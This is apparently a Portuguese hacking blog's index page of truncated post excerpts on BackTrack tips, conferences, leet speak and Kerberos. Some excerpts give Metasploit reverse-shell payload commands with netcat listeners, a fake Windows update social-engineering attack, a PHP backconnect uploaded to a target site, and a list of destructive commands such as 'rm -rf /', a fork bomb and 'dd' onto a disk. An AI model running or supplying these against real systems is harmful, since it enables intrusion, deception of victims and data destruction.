Add-on de segurança do Mozilla com Backdoor

Um backdoor foi descoberto entre uma coleção de ferramentas de teste de segurança para o Firefox.Autor: Paul Mutton Um add-on do Mozilla firefox que explora vulnerabilidades em aplicativos web, que foi adicionado a coleção de ferramentas "Web Penetration Testing" do mozila, simplificava o processo das descobertas da vulnerabilizas.Usando o Mozilla Sniffer add-on, você introduzia uma vulnerabilidade na aplicação que estava sendo testada, quando era...

Escrita em leet (l33t, 1337, l337)

Leet é uma forma de se escrever o alfabeto latino usando outros símbolos em lugar das letras, como números por exemplo. A própria palavra leet admite muitas variações, como l33t, 1337 ou l337. O uso do leet reflete uma subcultura relacionada ao mundo dos jogos de computador e internet, sendo muito usada para confundir os iniciantes e afirmar-se como parte de um grupo.OrigemLeet veio da pronúncia da palavra elite em inglês, no sentido de que o usuário que escreve em leet faz parte de uma elite dentro da comunidade. A expressão surgiu nos anos 80...

Inscrições Abertas para o H2HC 2010 - 7ª Edição

Hackers To Hackers Conference (H2HC) é uma conferência organizada por pessoas que trabalham ou que estão diretamente envolvidas com pesquisas e desenvolvimento na área de segurança da informação, cujo principal objetivo é permitir a disseminação, discussão e a troca de conhecimento sobre segurança da informação entre os participantes e também entre as empresas envolvidas no evento. Com treinamentos e palestras apresentadas por membros respeitados do mundo corporativo, grupos de pesquisas e comunidade underground, neste ano a conferência promete...

Papel de parede do Backtrack 2010

SMTX criou o wallpaper, publicou no canal de IRC, acabou sendo nomeado o oficial do backtrack 2010.Baixar: http://a.imageshack.us/img812/6884/btdmatrixwallpaper1980x.jpgFonte: http://www.s3cur1ty.de/backtrack-day-wallpaper-leaked...

Internet e logon automático no Backtrack 4

Dica básica de como iniciar o backtrack 4 automaticamente e já configurado a internet.Em modo gráfico, abra o Shell: kate /root/.bash_profileDigite: start-networkwicd-clientSalve o arquivo e reinicie o micro. Você perceberá que carregará o modulo "wicd", vai mostrar no canto inferior esquerdo do painel, o ícone de conexão com a internet.Novamente abra o arquivo .bash_profile:kate /root/.bash_profilePode apagar o wicd-client que já esta configurado e digite:start-networkstartx  Reinicie o micro novamente, você notará que vai pedir...

Testes básicos de redes

$ ping google.com               # Checando conexão com a internet$ traceroute google.com         # Traçando rotas de pacotes IP$ ifconfig                      # Configuração do host$ route -n                      # Checando configuração...

Web Application Exploits and Defenses

Quer vencer os hackers em seu próprio jogo?    * Saiba como hackers encontrar vulnerabilidades de segurança!    * Saiba como os hackers exploram aplicações web!    * Saiba como pará-los!A codelab mostra como vulnerabilidades de aplicativos web podem ser exploradas e como se defender contra esses ataques. A melhor maneira de aprender coisas que está fazendo, então você terá uma chance de fazer alguns testes...

Atualização falsa [MITM+ettercap+metasploit+ES]

Nela aula eu mostro como usar engenharia social para efetuar um ataque. Na vídeo eu faço um MITM para redirecionar todo trafego de um host para meu micro, crio um backdoor com metasploit, faço uma pagina falsa de atualização do Windows que está em meu micro e inicio o apache, e espero que nosso alvo caia na engenharia social e execute o arquivo para que possamos ter acesso a maquina dele.Programas usados:MetasploitEttercapComandos:msfpayload windows/meterpreter/reverse_tcp LHOST=SeuIP LPORT=8080 X > /NomeDoArquivo.exeuse multi/handlerset payload...

Backdoor - Shell reverse para Linux

Nessa vídeo aula, eu usei o metasploit para criar uma carga de shell reverse para sistema operacional linux. Deixo o netcat escutando na porta escolhido aguardando o arquivo ser executado em uma maquina linux. Comandos:/pentest/exploits/framework3/msfpayload linux/x86/shell_reverse_tcp LHOST=SeuIP LPORT=5050 Cnc -lvp 5050 Programas usados:MetasploitNetcatInformações:Metasploit: www.metasploit.comConexão reversa: http://en.wikipedia.org/wiki/Reverse_connectionLinux: http://pt.wikipedia.org/wiki/LinuxNetcat: http://pt.wikipedia.org/wiki/NetcatSobre...

Comandos letais em Linux

Vou lista alguns comandos que não podem ser executados em hipótese nenhuma em seu distro, mas caso ainda deseje executar, segue a lista. Esses causam panico no kernel ou congelam as distro:dd if=/dev/random of=/dev/port:( ){:|:&};:  -> Esse e conhecido fork bomb - http://en.wikipedia.org/wiki/Fork_bombAlgum desse apagará todo seu diretorio home, raiz ou vai apagar seu distro inteiro: sudo rm -rf /rm -rf .*dd if=/dev/zero of=/dev/sdamkfs.ext3 /dev/hdawhatever > /dev/hdacd ~; for x in `ls`; do mv -f $x $y; y=$x; donefind -type f -mtime...

Live Hacking CD

Hacking Live CD é uma distribuição Linux novo repleto de ferramentas e utilitários para hacking ético, testes de penetração e verificação contramedida. Baseado no Ubuntu este "Live CD" é executado diretamente do CD e não requer instalação em seu disco rígido. Uma vez iniciado você pode usar as ferramentas incluídas para testar, verificar, eticamente hack e realizar testes de penetração em sua própria rede para se certificar de que ele é seguro contra...

Backconnect em php - Metasploit

Ola pessoal, nesse tutorial vou mostrar com fazer um backconect em php encondado em base64, para temos acesso ao shell via conexão reversa.Siga os seguinte passos:Salve com extensão .php, faça upload do arquivo no servidor do site desejado.Agora vamos deixar o netcat escutando na porta 2121.Agora acionamos o arquivo Ex:hxxt://www.site.com.br/imagem/Bhior.php?É pronto... temos acesso a shell do site.Programas usados:Metasploit - http://www.metasploit.com/Netcat...

Kerberos vs NTLM

Ola pessoal, esse tutorial foi escrito por INEM, e tenho o maior prazer em divulgar o material no blog. O INEM e administrador do www.forum-underground.com e um dos parceiros do blog.TUTORIAL KERBEROS vs NTLM Olá pessoal,Realizei um tutorial que explica a fundo o funcionamento do Protocol Kerberos, formas de quebrar essas senhas e também como protege-lo. A ideia deste tutorial fornece somente apoio a pessoas que estejam a estudar Networking e Redes...